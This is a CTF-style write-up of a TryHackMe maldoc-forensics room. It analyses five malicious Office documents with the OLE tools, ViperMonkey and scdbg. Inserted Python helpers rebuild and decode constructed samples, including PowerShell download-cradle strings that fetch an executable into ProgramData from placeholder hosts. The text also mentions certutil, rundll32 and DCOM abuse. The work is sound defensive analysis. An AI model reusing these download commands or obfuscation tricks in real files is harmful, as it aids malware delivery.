Squid Game

Room link: https://tryhackme.com/room/squidgameroom

This room is about forensic analysis of malicious documents (maldocs).

Attacker 1

The toolkit that helps analyze malicious macros and other malicious code in .doc documents is the OLE toolset (oledump, olevba, olemeta, oletimes).

First, look at the document with oledump:

For the first question, the malicious C2 domain can be found in the maldoc, which downloads an executable. Finding the C2 means finding the executable-related strings inside obfuscated code, so we look through the streams to see what is inside.

Stream 4 contains something that looks like a PowerShell command. It is obfuscated and base64-encoded, and when the command is called it downloads something and calls out to the C2 domain.

More information is needed to identify it.

Let's try analyzing the source code using olevba:

Highlighted here: the macro replaces 'A' with '[', so we can apply the same substitution to the code we had in the previous section.

Now we can see the C2 domain, and the answer for question 2 as well: the folder that will hold the file is right there.
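As an added example (not part of the original writeup), the following Python script applies the substitution olevba revealed and then decodes the base64 layer to pull out the download URL and the drop folder. The stored string is constructed inside the script: the URL, the path and the exact layering (substitution on the outside, a base64 literal inside the PowerShell) are assumptions for this sample, not the room's real values.

```python
import base64
import re

# Constructed sample values; placeholders, not the room's real C2 or path.
SAMPLE_URL = "http://example.invalid/update.exe"
SAMPLE_DROP_PATH = r"C:\ProgramData\update.exe"


def build_stored_command() -> str:
    """Build the obfuscated string a macro like this might store.

    Assumed layering for this sample: the download URL is hidden as a base64
    literal inside a PowerShell one-liner, and every '[' in that one-liner is
    stored as 'A' (the macro's own Replace call puts '[' back at run time).
    The plaintext deliberately contains no other uppercase 'A'; otherwise the
    macro's substitution would corrupt it.
    """
    inner = base64.b64encode(SAMPLE_URL.encode()).decode()
    plain = (
        "$s=[System.Text.Encoding]::UTF8.GetString("
        f'[System.Convert]::FromBase64String("{inner}"));'
        f'(New-Object Net.WebClient).DownloadFile($s,"{SAMPLE_DROP_PATH}")'
    )
    return plain.replace("[", "A")


def undo_substitution(stored: str) -> str:
    """Reverse the substitution olevba showed: 'A' -> '['."""
    return stored.replace("A", "[")


B64_LITERAL = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')
URL_PATTERN = re.compile(r'https?://[^\s"\')]+')
WIN_PATH_PATTERN = re.compile(r'[A-Za-z]:\\[^"\'\s]+')


def decode_base64_literals(command: str) -> list:
    """Decode every FromBase64String("...") argument found in the command."""
    decoded = []
    for b64 in B64_LITERAL.findall(command):
        raw = base64.b64decode(b64)
        # PowerShell -EncodedCommand payloads are UTF-16LE; inline literals
        # are usually UTF-8. Choose by the presence of null bytes.
        try:
            text = raw.decode("utf-16le") if b"\x00" in raw else raw.decode("utf-8")
        except UnicodeDecodeError:
            text = raw.decode("latin-1")
        decoded.append(text)
    return decoded


def extract_iocs(stored: str) -> dict:
    """Apply the substitution, decode base64 layers, then collect URLs and paths."""
    command = undo_substitution(stored)
    haystack = "\n".join([command] + decode_base64_literals(command))
    return {
        "command": command,
        "urls": URL_PATTERN.findall(haystack),
        "paths": WIN_PATH_PATTERN.findall(haystack),
    }


if __name__ == "__main__":
    sample = build_stored_command()
    print("stored  :", sample)
    for key, value in extract_iocs(sample).items():
        print(f"{key:8}:", value)
```

Run as a script to see the stored form and the recovered command, URL list and path list; the two regexes are intentionally loose so the same helper can be pointed at any deobfuscated macro text.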

That will be the next answer; let's take a look at it by checking with PowerShell.

Following the hint and some research about CLSIDs, we have the CLSID here too:

Researching this CLSID turned up an article about it: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/

And there is the answer we need:

We can also see the IP and the .php extensions:

The next question does not need that anymore, so switch to another tool from the OLE toolset, olemeta, which extracts all standard document properties:

That also gives the answer about the phone number.

Back to olevba to get what we need for the next question:

The subject is right there when olemeta is used:

oletimes helps with the next question:

oledump provides the last two answers:

The M marks a stream containing a macro, and that is what we need.

Attacker 2

Now that we are familiar with the OLE tools, let's move on to the second maldoc:

This file provides more macros, and we also have the answer for the first question.

Option -i provides extra information:

So 15671 is the total size and 13867 is the size of the compiled code in the stream that contains the macro, and from this we can see the highest byte count for the next question.

We will search through the whole set of streams; option -v in oledump decompresses the VBA script that a stream may contain:

So this might be the string we need; reverse it to get the answer:

Next is finding two domains. They will start with http, so I do the search again with that; I prefer option -S, which extracts strings from the stream.

From stream 9 it looks like a suspect domain, so we have the first two domains for the answer. Taking a closer look we can also get the answers for the next two questions: the DLL file name and number are right there, along with the path (C:\).
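Under the hood, oledump -v performs the MS-OVBA decompression of the VBA source stream, and the -S step then scans the result for strings. As an added example (not the writeup's or oledump's code), here is a stdlib-only Python implementation of that decompressor, a minimal literal-only compressor used purely to build test input, and a strings-style URL search over the result. The macro text, URL and hand-built container bytes are constructed samples, not anything from the room.

```python
import math
import re
import struct


def decompress_vba(container: bytes) -> bytes:
    """Decompress an MS-OVBA compressed container (what oledump -v does).

    Layout: a 0x01 signature byte, then chunks. Each chunk starts with a
    16-bit little-endian header: bits 0-11 = chunk size minus 3, bits 12-14 =
    0b011, bit 15 = 1 if the chunk is compressed. Compressed data is a run of
    token sequences: one flag byte followed by up to eight tokens; a clear
    flag bit means a literal byte, a set bit means a 16-bit copy token that
    back-references already decompressed bytes of the same chunk.
    """
    if not container or container[0] != 0x01:
        raise ValueError("missing MS-OVBA container signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos < len(container):
        header = struct.unpack_from("<H", container, pos)[0]
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError(f"bad chunk signature at offset {pos}")
        chunk_end = pos + (header & 0x0FFF) + 3
        compressed = bool(header & 0x8000)
        pos += 2
        chunk_out_start = len(out)
        if not compressed:
            out += container[pos:pos + 4096]  # raw chunk: 4096 literal bytes
            pos += 4096
            continue
        while pos < chunk_end:
            flags = container[pos]
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(container[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]
                pos += 2
                # How the 16 bits split into offset and length depends on how
                # far into the decompressed chunk we already are.
                distance = len(out) - chunk_out_start
                if distance == 0:
                    raise ValueError("copy token before any literal in chunk")
                bit_count = max(math.ceil(math.log2(distance)), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                for i in range(length):  # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)


def compress_literal_only(data: bytes) -> bytes:
    """Build a valid container using literal tokens only (no back-references).

    Only meant to create test input here; real VBA streams use copy tokens,
    and inputs near the 4096-byte chunk limit would need raw chunks instead.
    """
    out = bytearray(b"\x01")
    for start in range(0, len(data), 4096):
        chunk = data[start:start + 4096]
        body = bytearray()
        for i in range(0, len(chunk), 8):
            body.append(0x00)  # flag byte: eight literal tokens follow
            body += chunk[i:i + 8]
        if len(body) + 2 > 4098:
            raise ValueError("chunk too large for literal-only encoding")
        out += struct.pack("<H", 0xB000 | (len(body) + 2 - 3)) + body
    return bytes(out)


URL_RE = re.compile(rb"https?://[^\s\"'()]+")


def find_urls(data: bytes) -> list:
    """strings-style URL hunt over decompressed VBA, like the oledump -S step."""
    return [m.decode("latin-1") for m in URL_RE.findall(data)]


# Hand-built container (constructed): literals "abcd" then one copy token
# (offset 4, length 8), which must decompress to "abcdabcdabcd".
HANDMADE = bytes.fromhex("01 06b0 10 61626364 0530")

# Constructed macro source with a placeholder URL, not the room's macro.
SAMPLE_VBA = (b'Attribute VB_Name = "Module1"\r\n'
              b'Sub AutoOpen()\r\n'
              b'    s = "http://example.invalid/a.dll"\r\n'
              b'End Sub\r\n')


if __name__ == "__main__":
    print(decompress_vba(HANDMADE))
    source = decompress_vba(compress_literal_only(SAMPLE_VBA))
    print(source.decode("latin-1"))
    print(find_urls(source))
```

The hand-built container exercises the copy-token path, including the overlapping copy (offset 4, length 8) that a naive slice copy would get wrong; in a real document the bytes fed to decompress_vba are the module stream contents starting at the offset recorded in the dir stream.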

Rundll32.exe is what runs the DLL file; we can research it to read more about that.

Stream 9 contains the information we need for the next question: the VBS script is in there, which is why it holds the important information we need to find and investigate:

We found the time the maldoc sleeps for the malicious DLLs to fully execute (15000 milliseconds), and for the stream name in the last question, just run oledump again and we can get it.

Attacker 3

Let's take a look with oledump first:

Now we are looking for an executable, so we can do the same as in the Attacker 2 step, changing what we search for and the document file.

Got the answer for the first question.

Looking at this, we can see that % marks a variable, and that is what gets replaced.

So the answer for the next question is certutil.

Doing the same search for http or https does not give us anything useful. Here we have another tool for this, ViperMonkey: a VBA emulation engine written in Python, designed to analyze and deobfuscate malicious VBA macros contained in Microsoft Office files.

Read more about it on GitHub: https://github.com/decalage2/ViperMonkey

Let's try it on this file:

Scrolling down and looking carefully, we can see the suspect http link here:

Also the folder it drops into (ProgramData).

Looking again at the earlier oledump result, we can see the stream that executes the binary:

So A3 is the answer we need.

Attacker 4

Again, oledump first to look at the streams:

Stream 7 contains the macro; let's take a deeper look into it.

Scroll down and we can see this:

It is an XORI function in VBA: the first parameter takes the text and the second is the key. We can read more about this here: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/deobfuscating-malicious-macros-using-python/

So let's decode that string.

Looks like we got the answer for the first question.

For the next two questions, let's decode more of the strings below that are passed to the XORI function; this is what we need:
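As an added example, not taken from the sample macro or the Trustwave post, here is a Python decoder for strings hidden the way this section describes: a Chr()-concatenated literal passed to XORI(text, key). The repeating-key XOR loop, the Chr() literal form and the XORI(literal, "key") call shape are assumptions about the usual form of such helpers, and the key and secrets in the constructed macro are placeholders.

```python
import re

# Matches Chr(65), ChrW(65), Chr$(65); the number is the character code.
CHR_CALL = re.compile(r"Chr[WB$]?\s*\(\s*(\d+)\s*\)", re.IGNORECASE)

# Matches XORI(<Chr()-built literal>, "key"). Assumed call shape.
XORI_CALL = re.compile(
    r'XORI\s*\(\s*((?:Chr[WB$]?\s*\(\s*\d+\s*\)\s*&?\s*)+)\s*,\s*"([^"]*)"\s*\)',
    re.IGNORECASE,
)


def xori(text: str, key: str) -> str:
    """Repeating-key XOR in the shape of the macro's XORI(text, key) helper:
    character i of text is XORed with key character (i mod len(key)).
    XOR is its own inverse, so the same call encodes and decodes."""
    if not key:
        raise ValueError("empty key")
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))


def parse_chr_concat(vba_expr: str) -> str:
    """Turn a VBA literal written as Chr(n) & Chr(m) & ... back into a string."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(vba_expr))


def looks_like_plaintext(s: str) -> bool:
    """Cheap sanity check for a decode: non-empty and entirely printable."""
    return bool(s) and all(c.isprintable() or c in "\r\n\t" for c in s)


def decode_xori_calls(macro_source: str) -> list:
    """Find every XORI(<literal>, "key") call and return (decoded, plausible)."""
    results = []
    for m in XORI_CALL.finditer(macro_source):
        decoded = xori(parse_chr_concat(m.group(1)), m.group(2))
        results.append((decoded, looks_like_plaintext(decoded)))
    return results


def build_constructed_macro(secrets, key: str) -> str:
    """Constructed sample: a VBA snippet that hides each secret the same way.
    Placeholders only; not the room's macro, key or strings."""
    lines = ["Sub AutoOpen()"]
    for i, secret in enumerate(secrets):
        literal = " & ".join(f"Chr({ord(c)})" for c in xori(secret, key))
        lines.append(f'    v{i} = XORI({literal}, "{key}")')
    lines.append("End Sub")
    return "\n".join(lines)


SAMPLE_KEY = "squid"  # constructed
SAMPLE_SECRETS = [r"C:\ProgramData\stage.exe", "http://example.invalid/stage.exe"]


if __name__ == "__main__":
    macro = build_constructed_macro(SAMPLE_SECRETS, SAMPLE_KEY)
    print(macro)
    for decoded, plausible in decode_xori_calls(macro):
        print(f"{'ok' if plausible else '??'} {decoded}")
```

The plausibility flag is there because a wrong key still "decodes" to something; a result full of control characters is the usual sign that the key or the literal was copied incorrectly from the macro.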

The same goes for the second binary next.

From here we got the last answer for Attacker 4 too.

Attacker 5

oledump to take a first look at the streams:

Now let's find the caption; with option -e we can extract the embedded file.

Got the answer we need for the first question.

Next, try vmonkey on this file and we get the base64-encoded data.

Remove the null bytes and we get some information.

We can see the gzip compression in here; luckily CyberChef has a Gunzip operation that can decompress the base64-decoded output.

We get the answer here too.

That code shows the math: it XORs the base64-decoded data with 35, so let's do another decode on that.

We can also see the IP address right there, and the answer for the User-Agent question.
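The three layers just described (base64 with null bytes from UTF-16LE, then gzip, then a base64 blob XORed with 35) can be peeled with a few lines of Python instead of CyberChef. This is an added example, not the writeup's or ViperMonkey's code: it wraps a fake blob the same way in reverse so it can run offline, and the IP (a TEST-NET address), the User-Agent string and the script text are constructed placeholders; the PowerShell snippets are assumptions about the shape of the script, not the room's actual content.

```python
import base64
import gzip
import re

B64_ARG = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
XOR_KEY = re.compile(r"-bxor\s+(\d+)", re.IGNORECASE)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", re.ASCII)
USER_AGENT = re.compile(r"User-Agent:\s*([^\r\n\x00]+)", re.ASCII)


def build_wrapped_sample() -> str:
    """Constructed sample: wrap a fake blob the way the writeup describes,
    applied in reverse. Inner: XOR with 35, base64, inside a small script.
    Middle: gzip + base64 that script. Outer: PowerShell text stored as
    UTF-16LE (hence the null bytes) and base64-encoded. Placeholder values."""
    fake_blob = (b"\x90\x90\x00"
                 b"192.0.2.10\x00"
                 b"User-Agent: Mozilla/5.0 (Windows NT 10.0; constructed)\r\n\x00")
    xored = bytes(b ^ 35 for b in fake_blob)
    inner = ("$b=[Convert]::FromBase64String('" + base64.b64encode(xored).decode()
             + "');$sc=$b|%{$_ -bxor 35}")
    gz_b64 = base64.b64encode(gzip.compress(inner.encode())).decode()
    outer = ("$stage=(New-Object IO.StreamReader((New-Object IO.Compression.GzipStream("
             "[IO.MemoryStream][Convert]::FromBase64String('" + gz_b64 + "'),"
             "[IO.Compression.CompressionMode]::Decompress)),"
             "[Text.Encoding]::ASCII)).ReadToEnd()")
    return base64.b64encode(outer.encode("utf-16le")).decode()


def strip_nulls(data: bytes) -> bytes:
    """The 'remove the null bytes' step: UTF-16LE ASCII text -> plain ASCII."""
    return data.replace(b"\x00", b"")


def base64_argument(script: str) -> bytes:
    """Pull the FromBase64String('...') argument out of a script and decode it."""
    m = B64_ARG.search(script)
    if not m:
        raise ValueError("no FromBase64String('...') literal found")
    return base64.b64decode(m.group(1))


def unwrap(outer_b64: str) -> dict:
    """Peel the three layers and pull indicators out of the final blob."""
    # Layer 1: base64 -> UTF-16LE PowerShell; drop nulls to read it as text.
    layer1 = strip_nulls(base64.b64decode(outer_b64)).decode("latin-1")
    # Layer 2: its base64 argument is gzip data (CyberChef's Gunzip step).
    layer2 = gzip.decompress(base64_argument(layer1)).decode("latin-1")
    # Layer 3: that script XORs another base64 blob with a single-byte key.
    m = XOR_KEY.search(layer2)
    if not m:
        raise ValueError("no -bxor key found in stage-2 script")
    key = int(m.group(1))
    blob = bytes(b ^ key for b in base64_argument(layer2))
    text = blob.decode("latin-1")
    ua = USER_AGENT.search(text)
    return {
        "xor_key": key,
        "ips": IPV4.findall(text),
        "user_agent": ua.group(1) if ua else None,
        "blob_length": len(blob),
    }


if __name__ == "__main__":
    for name, value in unwrap(build_wrapped_sample()).items():
        print(f"{name:12}: {value}")
```

The key is read from the stage-2 script rather than hard-coded, so the same unwrap works when a different sample uses a different single-byte key; the IP and User-Agent come out of the final blob exactly as the writeup found them before handing the bytes to scdbg.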

It is not very readable, but we can see the User-Agent, which probably means this is shellcode. We have a tool for analyzing this: scdbg.

We can also try it right here; take a look at this tool's options:

Let's save the file first, then use this tool to analyze the shellcode.

Let's try the basic usage first:

I got the port number too.

For the path value we can use /s, or upload the file to VirusTotal as another way (VirusTotal also provides the port number of the connecting server and the IP).

We can also see the first two APIs right there (LoadLibraryA and InternetOpenA).

Note: we can upload the file to VirusTotal from outside the machine.
